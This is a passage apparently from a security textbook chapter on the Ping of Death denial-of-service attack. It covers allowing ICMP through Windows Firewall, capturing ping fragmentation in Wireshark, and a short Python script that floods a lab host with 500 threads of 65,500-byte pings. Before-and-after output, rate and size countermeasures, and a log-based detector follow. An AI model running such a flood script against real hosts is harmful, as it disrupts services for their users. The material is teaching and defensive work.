20.1. Setting Windows Firewall
In order to use the “ping” command in a Windows environment, you must first configure the firewall on the server PC to allow ICMP.
• Select [Control Panel - System and Security - Windows Firewall - Advanced Settings]
Figure 20-1 Windows Firewall – Advanced Settings
• Select [Inbound Rules - New Rule]
Figure 20-2 Inbound Rules - New Rule
• Select [Rule Type - Custom]
Figure 20-3 Rule Type
• Select [Program - All Programs]
Figure 20-4 Programs
• Select “ICMPv4” in [Protocol and Ports - Protocol type] and click the [Customize] button
Figure 20-5 Protocol type – ICMPv4
• Select [Specific ICMP types - Echo Request]
Figure 20-6 Select Echo Request
• Select [Scope] and confirm that the [Any IP address] entry is checked.
Figure 20-7 Select Scope
• Select [Action] and confirm that the [Allow the connection] entry is checked.
Figure 20-8 Select Action
• Select [Name], enter the name you want to use for the rule, and finally click the [Finish] button.
Figure 20-9 Enter the Name
• Open a command prompt window on the hacker PC and confirm the setting as follows.
Figure 20-10 Check Setting
20.2. Installing Wireshark
To understand the detailed operation of the ping command, let's first install a monitoring tool. Wireshark supports network monitoring and packet sniffing. You can obtain the installer from the download page (http://www.wireshark.org/download.html), and the program is installed simply by running the downloaded file.
Figure 20-11 Concept of the Ping of Death
Now run “ping” in a command prompt on Windows and examine its operation in Wireshark. Start Wireshark and begin capturing; then, when you run “ping” in the command prompt, the details of the network activity appear on the Wireshark screen. The data size can be set with “ping IP -l transfer-data-size”. By default “ping” transmits 32 bytes of data, and it can transfer up to 65,500 bytes. As test data, “ping” repeatedly transmits the characters “a” through “z” up to the requested length.
Figure 20-12 Run “ping” on the Command Window
The “ping” command by default sends an ICMP echo request four times. The number of requests can be controlled with command options, and when execution completes, the response time measured for each reply from the server is displayed on screen. A large response time means the network between the server and the client is not stable, which is why the “ping” command is often used to test whether the network is operating normally.
Figure 20-13 WireShark Packet Capture
The results of the “ping server -l 65500” command are shown in the Wireshark capture. In the upper part, you can see that the 65,500-byte packet is transmitted broken up into 1,480-byte units. In the middle part, you can see that a substantial amount of packet data has been divided in the transport layer. In the last part, you can see that the data has been delivered to the application layer. The 65,500 bytes of data are transmitted to the server by dividing them into 44 pieces. If you run 100 “ping” commands at a time, one per thread, all 44,000 large packets can be seen being sent to the server.
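As an added example (not the book's code) of the fragmentation the capture shows: an echo request carrying 65,500 bytes of data is 65,508 bytes at the IP layer, which over a 1,500-byte Ethernet MTU becomes 44 fragments of 1,480 bytes plus one final 388-byte fragment; with IP reassembly enabled (the default), Wireshark lists the first 44 as “Fragmented IP protocol” and shows the last one as the reassembled echo request. The MTU and header sizes below are assumptions.

```python
# Added example (not from the original page): how the IP layer splits the
# 65,500-byte ping shown above into fragments. Assumes a 1,500-byte Ethernet
# MTU and a 20-byte IPv4 header without options (constructed assumptions).
MAX_DATAGRAM = 65535      # largest IPv4 datagram (total-length field is 16 bits)
IPV4_HEADER = 20          # minimal IPv4 header, no options
ICMP_HEADER = 8           # ICMP echo header: type, code, checksum, id, seq
MTU = 1500                # Ethernet MTU assumed here


def fragment_icmp_echo(payload_len, mtu=MTU):
    """Return [(offset_bytes, data_len, more_fragments), ...] for one echo
    request whose ICMP data field is payload_len bytes long."""
    total = ICMP_HEADER + payload_len
    if IPV4_HEADER + total > MAX_DATAGRAM:
        # The classic Ping of Death condition: the fragments would reassemble
        # into a datagram larger than the 65,535-byte maximum. This is why
        # Windows ping caps -l at 65,500 (65,500 + 8 + 20 = 65,528).
        raise ValueError("datagram would exceed %d bytes" % MAX_DATAGRAM)
    # Every fragment but the last must carry a multiple of 8 bytes, because
    # the fragment-offset field counts 8-byte units: (1500 - 20) // 8 * 8 = 1480.
    per_frag = (mtu - IPV4_HEADER) // 8 * 8
    frags, offset = [], 0
    while offset < total:
        data_len = min(per_frag, total - offset)
        more = offset + data_len < total        # MF flag set on all but the last
        frags.append((offset, data_len, more))
        offset += data_len
    return frags


def summarize(payload_len, mtu=MTU):
    """Counts a practitioner would compare against the Wireshark capture."""
    frags = fragment_icmp_echo(payload_len, mtu)
    per_frag = (mtu - IPV4_HEADER) // 8 * 8
    return {
        "fragments": len(frags),
        "full_size_fragments": sum(1 for _, n, _ in frags if n == per_frag),
        "last_fragment_bytes": frags[-1][1],
        "bytes_on_wire": sum(IPV4_HEADER + n for _, n, _ in frags),
    }


if __name__ == "__main__":
    for off, n, more in fragment_icmp_echo(65500):
        print("offset=%5d bytes (field=%4d)  data=%4d  MF=%d" % (off, off // 8, n, more))
    print(summarize(65500))   # 45 fragments: 44 x 1,480 bytes + 1 x 388 bytes
    print(summarize(32))      # the default 32-byte ping fits in one datagram
```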
20.3. Ping of Death Example
Currently, to improve system performance, the size of the data that can be sent in a ping command on the network is limited to 65,500 bytes, so the Ping of Death attack often fails. However, when DoS attacks first appeared, it was considered a powerful attack tool. In the following example it is difficult to achieve the effect of a substantial attack; however, the conditions are sufficient to understand how a DoS attack using ICMP is implemented.
# Python 2 script, as in the original (thread module, print statement).
import subprocess
import thread
import time

def POD(id): #(1)
    # Run one 65,500-byte ping against the host named "server";
    # the thread ends when the ping command returns.
    ret = subprocess.call("ping server -l 65500", shell=True)
    print "%d," % id

for i in range(500): #(2)
    thread.start_new_thread(POD, (i,)) #(3)
    time.sleep(0.8) #(4)
Execute the attack from the command prompt in Windows. Multiple threads are used to generate a large amount of traffic by executing ping commands in parallel.
(1) Declaring Function: declare a function that executes the ping command. Each thread calls this function.
(2) Iteration: generate 500 threads.
(3) Creating Threads: call the POD function in a new thread, passing the loop index as an argument so that the number of the created thread can be identified.
(4) Pause: after creating each thread, wait 0.8 seconds to reduce the load on the hacker PC.
When the above example is executed, the server PC does not go down and its performance is not significantly reduced. Let's look at the impact on performance by running the ping command from the client PC. If you enter “ping server -t” in a command prompt on Windows, the ping command repeats until it is forcibly stopped. Let's compare the output before and after executing the Ping of Death.
Before Execution:
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128

After Execution:
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=3ms TTL=128
Reply from 169.254.27.229: bytes=32 time=2ms TTL=128
Reply from 169.254.27.229: bytes=32 time=19ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=2ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=6ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Reply from 169.254.27.229: bytes=32 time<1ms TTL=128
Reply from 169.254.27.229: bytes=32 time=1ms TTL=128
Figure 20-14 Client PC ping Command Execution Result
Early in the test, the response time of the ping command does not change much. When the number of threads exceeds 100, a little performance degradation can be observed, to the extent that the response time becomes greater than 10 ms. To prevent a Ping of Death attack, you must therefore limit the number of pings that can arrive over a period of time, or block all incoming pings from outside. You also need to set a firewall policy that blocks ping requests larger than the normal size.
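The two countermeasures just described, a per-source rate limit and an oversize check, as an added detection example (not the book's code) run over constructed ICMP log lines; the log format, thresholds and addresses are assumptions made for this example.

```python
# Added example (not from the original page): the rate and size checks the
# text recommends, run over constructed ICMP log lines. Log format, thresholds
# and addresses are all assumptions made for this example.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+) ICMP echo-request len=(\d+)$")
MAX_PAYLOAD = 1472            # largest echo payload that fits one 1,500-byte frame
RATE_LIMIT = 20               # echo requests allowed per source per window
WINDOW = timedelta(seconds=1)


def detect(lines, max_payload=MAX_PAYLOAD, rate_limit=RATE_LIMIT, window=WINDOW):
    """Return (kind, source, timestamp, value) alerts: 'oversized' for every
    echo request above max_payload, and 'flood' once per source each time its
    request count inside the sliding window first exceeds rate_limit."""
    alerts, recent = [], defaultdict(deque)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                      # not an echo-request record, ignore
        ts, src, size = datetime.fromisoformat(m.group(1)), m.group(2), int(m.group(4))
        if size > max_payload:
            alerts.append(("oversized", src, ts, size))
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) == rate_limit + 1:      # alert exactly when the limit is crossed
            alerts.append(("flood", src, ts, len(q)))
    return alerts


def make_sample_log():
    """Constructed sample: 4 normal pings from one host, then a burst of 25
    maximum-size pings from another host within 0.75 s (like the script above)."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    fmt = "%s %s -> 169.254.27.229 ICMP echo-request len=%d"
    lines = [fmt % ((t0 + timedelta(seconds=i)).isoformat(), "169.254.27.10", 32)
             for i in range(4)]
    lines += [fmt % ((t0 + timedelta(milliseconds=30 * i)).isoformat(), "169.254.27.99", 65500)
              for i in range(25)]
    return sorted(lines)                  # chronological, as a real log would be


def count_by_kind(alerts):
    counts = defaultdict(int)
    for kind, _, _, _ in alerts:
        counts[kind] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in detect(make_sample_log()):
        print(alert)
    print(count_by_kind(detect(make_sample_log())))   # {'oversized': 25, 'flood': 1}
```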